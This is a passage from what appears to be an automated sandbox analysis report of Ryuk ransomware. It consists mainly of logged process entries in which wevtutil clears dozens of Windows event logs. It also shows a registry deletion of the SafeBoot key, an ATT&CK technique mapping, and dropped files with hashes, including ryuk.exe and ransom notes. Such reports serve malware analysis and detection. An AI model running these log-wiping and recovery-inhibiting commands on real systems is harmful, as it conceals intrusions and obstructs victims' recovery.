wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Analytic"
3⤵
PID:3540

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Debug"
3⤵
- Clears Windows event logs
PID:2332

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Operational"
3⤵
PID:4724

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-IPC/Operational"
3⤵
PID:1436

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Analytic"
3⤵
- Clears Windows event logs
PID:4672

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Debug"
3⤵
PID:5044

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Operational"
3⤵
PID:2676

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AAD/Analytic"
3⤵
PID:1136

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AAD/Operational"
3⤵
PID:3624

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ADSI/Debug"
3⤵
PID:1520

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ASN1/Operational"
3⤵
- Clears Windows event logs
PID:3064

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ATAPort/General"
3⤵
PID:424

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"
3⤵
PID:3792

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"
3⤵
PID:3348

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-All-User-Install-Agent/Admin"
3⤵
PID:220

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AllJoyn/Debug"
3⤵
PID:3412

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AllJoyn/Operational"
3⤵
- Clears Windows event logs
PID:2128

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppHost/Admin"
3⤵
- Clears Windows event logs
PID:224

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppHost/ApplicationTracing"
3⤵
PID:3504

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppHost/Diagnostic"
3⤵
PID:4396

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppHost/Internal"
3⤵
- Clears Windows event logs
PID:2704

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppID/Operational"
3⤵
PID:2868

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"
3⤵
PID:2388

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"
3⤵
- Clears Windows event logs
PID:3808

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppLocker/Packaged app-Deployment"
3⤵
PID:4832

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppLocker/Packaged app-Execution"
3⤵
- Clears Windows event logs
PID:1312

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Admin"
3⤵
- Clears Windows event logs
PID:784

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Analytic"
3⤵
PID:3884

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Debug"
3⤵
PID:3464

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Diagnostics"
3⤵
- Clears Windows event logs
PID:3416

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppModel-State/Debug"
3⤵
PID:3704

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppModel-State/Diagnostic"
3⤵
PID:4448

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppReadiness/Admin"
3⤵
PID:4972

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppReadiness/Debug"
3⤵
PID:4120

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppReadiness/Operational"
3⤵
PID:2588

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppSruProv"
3⤵
- Clears Windows event logs
PID:1300

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppXDeployment/Diagnostic"
3⤵
- Clears Windows event logs
PID:2980

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppXDeployment/Operational"
3⤵
PID:3212

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Debug"
3⤵
- Clears Windows event logs
PID:3756

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Diagnostic"
3⤵
PID:4472

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Operational"
3⤵
PID:3712

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Restricted"
3⤵
PID:396

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ApplicabilityEngine/Analytic"
3⤵
PID:2284

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ApplicabilityEngine/Operational"
3⤵
- Clears Windows event logs
PID:3832

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"
3⤵
PID:3860

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"
3⤵
- Clears Windows event logs
PID:280

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"
3⤵
PID:628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"
3⤵
PID:4660

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Compatibility-Infrastructure-Debug"
3⤵
PID:3552

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"
3⤵
PID:2100

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Analytic"
3⤵
PID:4104

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Trace"
3⤵
PID:4728

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"
3⤵
PID:1328

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"
3⤵
PID:2132

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"
3⤵
- Clears Windows event logs
PID:3436

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Steps-Recorder"
3⤵
PID:3484

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Debug"
3⤵
PID:4312

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Operational"
3⤵
PID:3176

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Performance"
3⤵
PID:724

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AssignedAccess/Admin"
3⤵
PID:616

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AssignedAccess/Operational"
3⤵
PID:4188

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AssignedAccessBroker/Admin"
3⤵
PID:4300

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AssignedAccessBroker/Operational"
3⤵
PID:3816

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AsynchronousCausality/Causality"
3⤵
PID:4476

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"
3⤵
PID:5008

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/GlitchDetection"
3⤵
PID:2296

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/Informational"
3⤵
PID:4800

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/Operational"
3⤵
PID:544

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/Performance"
3⤵
- Clears Windows event logs
PID:4444

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/PlaybackManager"
3⤵
PID:3896

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audit/Analytic"
3⤵
PID:5068

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"
3⤵
PID:3576

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Authentication/AuthenticationPolicyFailures-DomainController"
3⤵
PID:5084

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUser-Client"
3⤵
- Clears Windows event logs
PID:4888

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUserFailures-DomainController"
3⤵
PID:4708

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUserSuccesses-DomainController"
3⤵
- Clears Windows event logs
PID:4416

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"
3⤵
- Clears Windows event logs
PID:5104

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BTH-BTHPORT/HCI"
3⤵
- Clears Windows event logs
PID:3404

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BTH-BTHPORT/L2CAP"
3⤵
PID:2116

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BTH-BTHUSB/Diagnostic"
3⤵
- Clears Windows event logs
PID:4428

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BTH-BTHUSB/Performance"
3⤵
- Clears Windows event logs
PID:1584

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic"
3⤵
PID:4976

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BackgroundTaskInfrastructure/Operational"
3⤵
- Clears Windows event logs
PID:2368

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BackgroundTransfer-ContentPrefetcher/Operational"
3⤵
PID:2176

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Backup"
3⤵
- Clears Windows event logs
PID:1208

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Base-Filtering-Engine-Connections/Operational"
3⤵
PID:2860

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Base-Filtering-Engine-Resource-Flows/Operational"
3⤵
- Clears Windows event logs
PID:2904

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Battery/Diagnostic"
3⤵
- Clears Windows event logs
PID:3596

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Biometrics/Analytic"
3⤵
PID:1476

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"
3⤵
PID:2416

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"
3⤵
- Clears Windows event logs
PID:4632

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"
3⤵
PID:1048

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BitLocker-Driver-Performance/Operational"
3⤵
PID:3900

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BitLocker/BitLocker Management"
3⤵
- Clears Windows event logs
PID:2976

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BitLocker/BitLocker Operational"
3⤵
PID:2672

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BitLocker/Tracing"
3⤵
PID:3332

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"
3⤵
PID:2256

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"
3⤵
PID:1924

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bluetooth-BthLEPrepairing/Operational"
3⤵
- Clears Windows event logs
PID:212

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bluetooth-Bthmini/Operational"
3⤵
PID:1012

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"
3⤵
PID:2468

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bluetooth-Policy/Operational"
3⤵
PID:2624

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"
3⤵
PID:2560

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"
3⤵
- Clears Windows event logs
PID:4340

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"
3⤵
PID:2276

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheMonitoring/Analytic"
3⤵
PID:3508

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"
3⤵
- Clears Windows event logs
PID:3248

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"
3⤵
PID:3992

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CAPI2/Catalog Database Debug"
3⤵
- Clears Windows event logs
PID:4764

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"
3⤵
PID:4920

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CDROM/Operational"
3⤵
PID:2908

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/Analytic"
3⤵
PID:2884

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/ApartmentInitialize"
3⤵
PID:3936

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/ApartmentUninitialize"
3⤵
PID:4584

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/Call"
3⤵
- Clears Windows event logs
PID:3872

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/CreateInstance"
3⤵
PID:2372

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/ExtensionCatalog"
3⤵
PID:3116

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/FreeUnusedLibrary"
3⤵
- Clears Windows event logs
PID:3948

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/RundownInstrumentation"
3⤵
PID:1440

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COMRuntime/Activations"
3⤵
PID:1156

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COMRuntime/MessageProcessing"
3⤵
PID:2588

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"
3⤵
PID:1300

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"
3⤵
PID:4848

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"
3⤵
- Clears Windows event logs
PID:2752

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-Lifecycle-System/Operational"
3⤵
PID:1632

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-Lifecycle-User/Operational"
3⤵
PID:296

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Cleanmgr/Diagnostic"
3⤵
- Clears Windows event logs
PID:1432

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"
3⤵
PID:4704

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CloudStore/Debug"
3⤵
PID:1900

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CloudStore/Operational"
3⤵
PID:4660

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"
3⤵
PID:808

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"
3⤵
PID:448

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"
3⤵
PID:3476

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"
3⤵
PID:4452

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"
3⤵
PID:3972

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Compat-Appraiser/Analytic"
3⤵
- Clears Windows event logs
PID:1424

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Compat-Appraiser/Operational"
3⤵
- Clears Windows event logs
PID:3828

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Containers-BindFlt/Debug"
3⤵
- Clears Windows event logs
PID:1392

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Containers-BindFlt/Operational"
3⤵
PID:1712

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Containers-Wcifs/Debug"
3⤵
PID:2324

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Containers-Wcifs/Operational"
3⤵
- Clears Windows event logs
PID:2300

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Containers-Wcnfs/Debug"
3⤵
PID:1304

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Containers-Wcnfs/Operational"
3⤵
PID:2524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CoreApplication/Diagnostic"
3⤵
PID:2216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CoreApplication/Operational"
3⤵
- Clears Windows event logs
PID:856

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CoreApplication/Tracing"
3⤵
PID:3920

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CoreSystem-SmsRouter-Events/Debug"
3⤵
PID:4076

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CoreSystem-SmsRouter-Events/Operational"
3⤵
- Clears Windows event logs
PID:5036

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CoreWindow/Analytic"
3⤵
PID:4784

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CoreWindow/Debug"
3⤵
PID:716

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"
3⤵
- Clears Windows event logs
PID:4468

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"
3⤵
- Clears Windows event logs
PID:4856

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crashdump/Operational"
3⤵
- Clears Windows event logs
PID:4132

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"
3⤵
PID:2144

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-BCRYPT/Analytic"
3⤵
- Clears Windows event logs
PID:4008

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-CNG/Analytic"
3⤵
PID:3048

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/BackUpKeySvc"
3⤵
PID:4228

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/Debug"
3⤵
PID:2724

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/Operational"
3⤵
PID:2840

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-DSSEnh/Analytic"
3⤵
- Clears Windows event logs
PID:4808

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-NCrypt/Operational"
3⤵
- Clears Windows event logs
PID:2084

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"
3⤵
- Clears Windows event logs
PID:3088

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-RSAEnh/Analytic"
3⤵
PID:1708

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"
3⤵
- Clears Windows event logs
PID:4356

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"
3⤵
PID:3164

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DAL-Provider/Analytic"
3⤵
PID:3540

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DAL-Provider/Operational"
3⤵
PID:2332

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DAMM/Diagnostic"
3⤵
- Clears Windows event logs
PID:4724

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"
3⤵
PID:1436

C:\Windows\system32\reg.exe
reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
1⤵
PID:432

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1980

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Hidden Files and Directories

T1158

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Indicator Removal on Host

T1070

File Deletion

T1107

File Permissions Modification

T1222

Hidden Files and Directories

T1158

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\RyukReadMe.txt
Filesize
1KB

MD5
f69127370e1f1aede86e881dd446f6aa

SHA1
65298f80e3b97f59ea45179463ab9c5cc3ee9337

SHA256
da7ec116558c3b21f68b5842391348e3597704f6f80ad11edeb9cc4fc9cc12bc

SHA512
5e80879ceabb6cb9e19a69d00942cb13989b063b416de55d9a00060b0180f38da0340b154652e6a01b9d48675da24a83b4023db3d20b46ba9729e0b26d98a8d4

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ryuk.exe
Filesize
885KB

MD5
6a5bf25ff4f72ebca91280ffda057260

SHA1
722063331acdbfc93ccbfacbec045800a835dd9e

SHA256
0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09

SHA512
64d6f8fe84882bb5b835388461e2f662d58b8b69ca6314869e4e4bd29496f4ae2d2bda5afa82cbfc6a29d563368343da1b19431fc24ec5261618a424543bce42

Download Submit
C:\ProgramData\RYUKID
Filesize
8B

MD5
96646b6ffcf3af7eb064254bce631a92

SHA1
39b6ce490f09e18700c2dfd7e9c5d0f838c18015

SHA256
083c5e0e62549bba38194e0255cab45e22fcbbc616eccf2cac65b5d06448325e

SHA512
62549bd813666a1ca1e6b0b134e23b5b7b2f97b41bf714cdbe255d43e3a29f49c77dae6067654c7ddfb6795d2cb21faffb61f90e9dae2d02a24ac8a0b7217f1f

Download Submit
C:\ProgramData\RyukReadMe.html
Filesize
152B

MD5
a641bf8ac8307aad57ecab53872e67db

SHA1
6fa8d69a859c34b8e75223ed8f426dbdf3d03df7

SHA256
9383b707c654726704f6968a151b67fa564653e91c8f3a31298b8cb81469d2ce

SHA512
7d32498611e54397ee320ab09380356c3470daf8e45e0a41d550df129027ca7279f14ec2b9f1b33d312ddca7b7f446f1c5689cae83502f4144f5807e39dcf5f4

Download Submit
C:\ProgramData\RyukReadMe.html.[[email protected]].RYK
Filesize
858B

MD5
563eebf53b99fa7232c70d3c0f62ef70

SHA1
2c96a4601310932c56aff155b4c349d967fef7b3

SHA256
c9b4f3cc18eda52e4d44dc28f88fb08de2d0c795300b3cfa76bb74628da2cbf9

SHA512
27ac815dd47873dbc77854c0f23e5b3fe5109d214f57bf109c1fa3197614b669826fbe5474550bfb6717a9a6ade1076723ef799ea217de98a82879fb8b5892c9

Download Submit
C:\ProgramData\RyukReadMe.txt
Filesize
1KB

MD5
f69127370e1f1aede86e881dd446f6aa

SHA1
65298f80e3b97f59ea45179463ab9c5cc3ee9337

SHA256
da7ec116558c3b21f68b5842391348e3597704f6f80ad11edeb9cc4fc9cc12bc

SHA512
5e80879ceabb6cb9e19a69d00942cb13989b063b416de55d9a00060b0180f38da0340b154652e6a01b9d48675da24a83b4023db3d20b46ba9729e0b26d98a8d4

Download Submit
C:\ProgramData\hrmlog1
Filesize
2KB

MD5
c196d16733a78154d37ce67c067df2b5

SHA1
323264d6511583242e2e419cbdf96fd4c9e47feb

SHA256
f203211837080d828c60ff920d9a56f0d1685a52d6b89a5726c7ca64def52330

SHA512
102d2b721004f795e6569cb9ed86c8aa71b0d6a222512eb0755763876f535b3382992bff2bd222bbb39fda026a0d823a385441b6fb8d5ac3c3ff0339fbb29cf5

Download Submit
C:\ProgramData\hrmlog1
Filesize
2KB

MD5
c196d16733a78154d37ce67c067df2b5

SHA1
323264d6511583242e2e419cbdf96fd4c9e47feb

SHA256
f203211837080d828c60ff920d9a56f0d1685a52d6b89a5726c7ca64def52330

SHA512
102d2b721004f795e6569cb9ed86c8aa71b0d6a222512eb0755763876f535b3382992bff2bd222bbb39fda026a0d823a385441b6fb8d5ac3c3ff0339fbb29cf5

Download Submit
C:\ProgramData\hrmlog1
Filesize
2KB

MD5
c196d16733a78154d37ce67c067df2b5

SHA1
323264d6511583242e2e419cbdf96fd4c9e47feb

SHA256
f203211837080d828c60ff920d9a56f0d1685a52d6b89a5726c7ca64def52330

SHA512
102d2b721004f795e6569cb9ed86c8aa71b0d6a222512eb0755763876f535b3382992bff2bd222bbb39fda026a0d823a385441b6fb8d5ac3c3ff0339fbb29cf5

Download Submit
C:\ProgramData\hrmlog2
Filesize
292B

MD5
d8ed18674f684ce44c7c99623a3e29f6

SHA1
2f05046d39d58aa484181c636468f808c816bb61

SHA256
650966f8a022df9095adcef804fca79105854ce8f75551192935b9dd9719f9eb

SHA512
86cfa182ddf4e6ce54ce6f0a9340b7fc374522f2ae9e6f5c3390bae2ecea7b3322ff0bd492f69bdc95585403e8d11fcedaf3555241d66b23acaff2308faba795

Download Submit
C:\ProgramData\hrmlog2
Filesize
292B

MD5
d8ed18674f684ce44c7c99623a3e29f6

SHA1
2f05046d39d58aa484181c636468f808c816bb61

SHA256
650966f8a022df9095adcef804fca79105854ce8f75551192935b9dd9719f9eb

SHA512
86cfa182ddf4e6ce54ce6f0a9340b7fc374522f2ae9e6f5c3390bae2ecea7b3322ff0bd492f69bdc95585403e8d11fcedaf3555241d66b23acaff2308faba795

Download Submit
C:\ProgramData\hrmlog2
Filesize
292B

MD5
d8ed18674f684ce44c7c99623a3e29f6

SHA1
2f05046d39d58aa484181c636468f808c816bb61

SHA256
650966f8a022df9095adcef804fca79105854ce8f75551192935b9dd9719f9eb

SHA512
86cfa182ddf4e6ce54ce6f0a9340b7fc374522f2ae9e6f5c3390bae2ecea7b3322ff0bd492f69bdc95585403e8d11fcedaf3555241d66b23acaff2308faba795

Download Submit
C:\ProgramData\ryuk.exe
Filesize
885KB

MD5
6a5bf25ff4f72ebca91280ffda057260

